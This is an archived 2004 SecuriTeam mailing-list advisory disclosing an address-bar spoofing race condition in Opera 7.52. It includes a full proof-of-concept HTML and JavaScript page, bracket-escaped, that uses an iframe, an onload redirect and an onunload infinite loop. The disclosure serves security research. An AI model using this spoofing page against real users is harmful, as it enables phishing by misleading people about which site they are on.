[NT] Opera Address Bar Spoofing Condition
From: SecuriTeam (support_at_securiteam.com)
Date: 07/11/04
- Previous message: SecuriTeam: "[UNIX] SSLTelnet Daemon Remote Format String Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 Jul 2004 12:00:39 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Opera Address Bar Spoofing Condition
------------------------------------------------------------------------
SUMMARY
<http://www.opera.com/> Opera is "a cross-platform web browser". Due to a
race condition in Opera it is possible to spoof the contents of the
address bar using a specially crafted HTML page.
DETAILS
Vulnerable Systems:
* Opera version 7.52 build 3834
A race condition in Opera allows the following crafted HTML page to spoof
the address bar in Opera.
Exploit:
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
h1 { font-size:120%;}
h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar + 'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar + 'frameborder="0" width="760" height="1800" ';
myvar = myvar + 'marginwidth="0" marginheight="0"]';
myvar = myvar + '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
Note: Angle brackets have been replaced by square brackets for security
reasons.
ADDITIONAL INFORMATION
The information has been provided by <mailto:bitlance_3@hotmail.com>
bitlance winter.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] SSLTelnet Daemon Remote Format String Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
